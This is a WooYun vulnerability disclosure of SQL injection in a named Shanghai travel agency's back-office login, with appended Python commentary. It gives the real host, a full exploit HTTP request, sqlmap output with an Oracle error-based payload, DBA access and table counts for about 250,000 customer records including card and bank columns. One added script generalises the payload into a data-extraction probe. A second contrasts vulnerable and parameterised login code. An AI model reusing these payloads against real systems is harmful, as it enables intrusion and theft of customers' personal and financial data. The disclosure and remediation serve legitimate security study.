
Vulnerability Summary

Defect ID: wooyun-2015-0159327

Title: SQL injection in a Datong Travel (大通旅游) system (DBA privileges / 250,000 customer records / several thousand employee records, etc.)

Vendor: 上海大通之旅旅行社 (Shanghai Datong Travel Agency)

Author: 路人甲

Submitted: 2015-12-09 11:13

Fix date: 2016-01-21 18:22

Disclosed: 2016-01-21 18:22

Type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability Details

Disclosure status:

2015-12-09: Actively contacting the vendor and awaiting the vendor's acknowledgement; details withheld from the public
2016-01-21: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

As titled.

Detailed description:

The vulnerability is in the Datong Travel back-office management system:
http://datong.china51766.com



The login check here is injectable:

POST /testlogin.aspx HTTP/1.1
Host: datong.china51766.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://datong.china51766.com/
Cookie: pgv_pvi=4732638208; ASP.NET_SessionId=xk5lct55tgedln55shu5er45
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 285

__VIEWSTATE=%2FwEPDwUKLTUzNDczNjI1MGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkJ1dHRfTG9naW6yokT4MPBhUuctrFUiU1vx3k%2FZPw%3D%3D&__EVENTVALIDATION=%2FwEWBAKCjZn4CALKh45EAoDQwugHAvmIxIsHfK0haUlHeUrVENyfDoTgcFYpvTk%3D&text_Name=admin&text_Pwd=123456&Butt_Login.x=0&Butt_Login.y=0


Both parameters, text_Name and text_Pwd, are injectable.
Injection type and environment:

sqlmap identified the following injection point(s) with a total of 209 HTTP(s) requests:
---
Parameter: text_Name (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __VIEWSTATE=/wEPDwUKLTUzNDczNjI1MGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkJ1dHRfTG9naW6yokT4MPBhUuctrFUiU1vx3k/ZPw==&__EVENTVALIDATION=/wEWBAKCjZn4CALKh45EAoDQwugHAvmIxIsHfK0haUlHeUrVENyfDoTgcFYpvTk=&text_Name=admin' AND 4378=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4378=4378) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'tecz'='tecz&text_Pwd=123456&Butt_Login.x=0&Butt_Login.y=0
---
[10:57:28] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle
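How the error-based payload in the sqlmap output above actually works, as an added illustration that is not part of the original report and not sqlmap's own code. sqlmap encodes its two random marker strings (qqqjq and qpkbq in this run) as CHR() chains so the injected text needs no quote characters inside the already-quoted username. Oracle's XMLType() constructor is then asked to parse the string <:qqqjq1qpkbq>, which is not a valid element name, and the resulting ORA-31011 / LPX-00110 error echoes the offending name, value included; since the application surfaces database errors in its response, sqlmap only has to regex the body for what lies between the markers. The comparison 4378=(...) never has to be true: the subquery raises before it is compared, so the error rather than the login result carries the data. The sample error response below is constructed for the example, modeled on that error chain; the function names are mine.

```python
import re
from typing import Optional

# The text_Name value sqlmap sent (URL-decoded copy of the payload in the sqlmap output above).
PAYLOAD = (
    "admin' AND 4378=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)"
    "||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4378=4378) THEN 1 ELSE 0 END)"
    " FROM DUAL)||CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL)"
    " AND 'tecz'='tecz"
)

# sqlmap's random marker strings for this run: the leaked value sits as <:PREFIX<value>SUFFIX>
PREFIX, SUFFIX = "qqqjq", "qpkbq"

# A run of CHR(n) calls joined with ||, e.g. CHR(60)||CHR(58)||CHR(113)
_CHR_RUN = re.compile(r"CHR\(\d+\)(?:\|\|CHR\(\d+\))*")


def chr_chain(text: str) -> str:
    """Encode text as CHR(n)||CHR(n)... so it needs no quote characters at the injection point."""
    return "||".join(f"CHR({ord(c)})" for c in text)


def decode_chr_runs(sql: str) -> str:
    """Replace every CHR(n)||CHR(n)... run with the equivalent quoted string literal, for reading."""
    def repl(m: "re.Match[str]") -> str:
        codes = re.findall(r"CHR\((\d+)\)", m.group(0))
        text = "".join(chr(int(c)) for c in codes)
        return "'" + text.replace("'", "''") + "'"
    return _CHR_RUN.sub(repl, sql)


def error_based_probe(inner_select: str, known_user: str = "admin") -> str:
    """Build the text_Name value that leaks the scalar result of inner_select through the XMLType error.

    With the CASE expression from the report this reproduces sqlmap's payload byte for byte; swapping in
    e.g. 'SELECT user FROM DUAL' turns the same template into a data-extraction probe (my generalisation).
    """
    return (
        f"{known_user}' AND 4378=(SELECT UPPER(XMLType({chr_chain('<:' + PREFIX)}"
        f"||({inner_select})||{chr_chain(SUFFIX + '>')})) FROM DUAL) AND 'tecz'='tecz"
    )


def leaked_value(response_body: str) -> Optional[str]:
    """Recover the value Oracle echoed between the markers, or None if the response carries none."""
    m = re.search(re.escape(PREFIX) + r"(.*?)" + re.escape(SUFFIX), response_body, re.S)
    return m.group(1) if m else None


# Constructed sample of what an unhandled ASP.NET error page would contain once Oracle rejects the XML;
# the wording follows the ORA-31011 / LPX-00110 chain and the "1" is the result of the CASE expression.
SAMPLE_ERROR_RESPONSE = """<title>Server Error in '/' Application.</title>
ORA-31011: XML parsing failed
ORA-19202: Error occurred in XML processing
LPX-00110: Warning: invalid QName ":qqqjq1qpkbq" (not a Name)
Error at line 1"""


if __name__ == "__main__":
    print(decode_chr_runs(PAYLOAD))
    print(error_based_probe("SELECT user FROM DUAL"))
    print("leaked:", leaked_value(SAMPLE_ERROR_RESPONSE))
```

The CASE WHEN (4378=4378) form is sqlmap confirming the injection point: a known-true condition must come back as "1" between the markers. Real extraction substitutes a SUBSTR(...) over the target column for the inner SELECT and walks the value in pieces, which is why the recovery above is a regex over the whole body rather than a parse of one error line; the body may wrap the error in HTML or truncate it.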


Databases:

available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] NEWTRAVEL
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


Database users:

database management system users [32]:
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NEWTRAVEL
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XS$NULL


Current schema and user:

current schema (equivalent to database on Oracle):    'NEWTRAVEL'
current user: 'NEWTRAVEL'


DBA privileges:

current user is DBA:    True


NEWTRAVEL contains 266 tables in total:

Database: NEWTRAVEL
[266 tables]
...


The CLIENT and CLIENTACCOUNT tables in NEWTRAVEL:

Database: NEWTRAVEL
+--------+---------+
| Table  | Entries |
+--------+---------+
| CLIENT | 250655  |
+--------+---------+
Database: NEWTRAVEL
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| CLIENTACCOUNT | 29563   |
+---------------+---------+


Some of the columns in CLIENT:

Database: NEWTRAVEL
Table: CLIENT
[51 columns]
+--------------+----------+
| Column       | Type     |
+--------------+----------+
| IDENTITY     | VARCHAR2 |
| ACCOUNT1     | VARCHAR2 |
| ACCOUNT2     | VARCHAR2 |
| ADDR         | VARCHAR2 |
| APPLYSHOP    | VARCHAR2 |
| BANK1        | VARCHAR2 |
| BANK2        | VARCHAR2 |
| BOSS         | VARCHAR2 |
| CARDNO       | VARCHAR2 |
...


And, in the same database, the USERS table (employee information) and the TOUR_GUIDE table (tour guide information):

Database: NEWTRAVEL
+-------+---------+
| Table | Entries |
+-------+---------+
| USERS | 1730    |
+-------+---------+
Database: NEWTRAVEL
+------------+---------+
| Table      | Entries |
+------------+---------+
| TOUR_GUIDE | 400     |
+------------+---------+


I will stop here and not dig any deeper.
I hope the company remediates this promptly; with this much data at stake it deserves some attention.

Proof of vulnerability:

Proven above.

Fix recommendation:

Don't know.
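The root cause and its remedy, as an added example that is not from the original report and not the vendor's code: a hypothetical login check that splices text_Name and text_Pwd into the SQL string (the bug class the report demonstrates), next to the same check written with bind variables. SQLite stands in for Oracle so the example runs offline; the Oracle-only XMLType error trick is therefore not reproduced, but the string splicing shown here is exactly why the report's payload, which opens with admin' and closes with AND 'tecz'='tecz, re-balances the quotes and is executed as SQL, and why a database error raised by injected SQL reaches the client at all. The USERS table and its column names are constructed test data, not the real schema. The other half of the fix is privilege: the application connects as NEWTRAVEL, which the sqlmap output shows to be a DBA, so an application account holding only the grants it needs would have bounded the impact of the same bug.

```python
import sqlite3
from typing import Callable


# Constructed stand-in for the NEWTRAVEL.USERS table; column names are assumptions, not the real schema.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE USERS (NAME TEXT NOT NULL, PWD TEXT NOT NULL)")
    con.execute("INSERT INTO USERS VALUES ('admin', 'correct-horse-battery')")
    return con


def build_query_vulnerable(name: str, pwd: str) -> str:
    """Hypothetical reconstruction of the bug class: the two form fields are spliced into the SQL text."""
    return "SELECT COUNT(*) FROM USERS WHERE NAME='" + name + "' AND PWD='" + pwd + "'"


def login_vulnerable(con: sqlite3.Connection, name: str, pwd: str) -> bool:
    """Whatever the user typed is parsed as SQL; database errors propagate to the caller unchanged."""
    return con.execute(build_query_vulnerable(name, pwd)).fetchone()[0] > 0


def login_fixed(con: sqlite3.Connection, name: str, pwd: str) -> bool:
    """Bind variables: values travel separately from the statement and are only compared, never parsed."""
    sql = "SELECT COUNT(*) FROM USERS WHERE NAME=:name AND PWD=:pwd"
    return con.execute(sql, {"name": name, "pwd": pwd}).fetchone()[0] > 0


def error_surfaces(con: sqlite3.Connection, login: Callable[..., bool], name: str) -> bool:
    """True if the injected name makes the database raise: the channel an error-based probe relies on."""
    try:
        login(con, name, "x")
        return False
    except sqlite3.DatabaseError:
        return True


# The report's payload shape: close the quote, inject, then 'tecz'='tecz re-balances the trailing quote.
REPORT_STYLE_NAME = "admin' AND 4378=(SELECT 1 FROM USERS) AND 'tecz'='tecz"
# A condition that cannot even be prepared, standing in for Oracle's XMLType parse failure.
ERRORING_NAME = "admin' AND 1=(SELECT no_such_column FROM USERS) AND 'tecz'='tecz"
# Two textbook bypasses: comment out the password check, or make the WHERE clause always true.
COMMENT_BYPASS_NAME = "admin'--"
ALWAYS_TRUE_PWD = "' OR 'a'='a"


if __name__ == "__main__":
    db = make_db()
    print(build_query_vulnerable(REPORT_STYLE_NAME, "123456"))
    print("vulnerable, comment bypass:", login_vulnerable(db, COMMENT_BYPASS_NAME, "wrong"))
    print("vulnerable, always-true pwd:", login_vulnerable(db, "nobody", ALWAYS_TRUE_PWD))
    print("vulnerable, DB error reaches caller:", error_surfaces(db, login_vulnerable, ERRORING_NAME))
    print("fixed, comment bypass:", login_fixed(db, COMMENT_BYPASS_NAME, "wrong"))
    print("fixed, DB error reaches caller:", error_surfaces(db, login_fixed, ERRORING_NAME))
    print("fixed, real credentials:", login_fixed(db, "admin", "correct-horse-battery"))
```

In the fixed version the same inputs are plain string values: admin'-- matches no user, the always-true password matches no password, and the erroring name raises nothing, so there is no error text for an error-based probe to read. Escaping quotes by hand is not an equivalent fix; only a prepared statement keeps data and code on separate channels.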

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting.


Vulnerability Response

Vendor response:

The vendor could not be reached, or the vendor actively declined.

Vulnerability Rank: 15 (WooYun rating)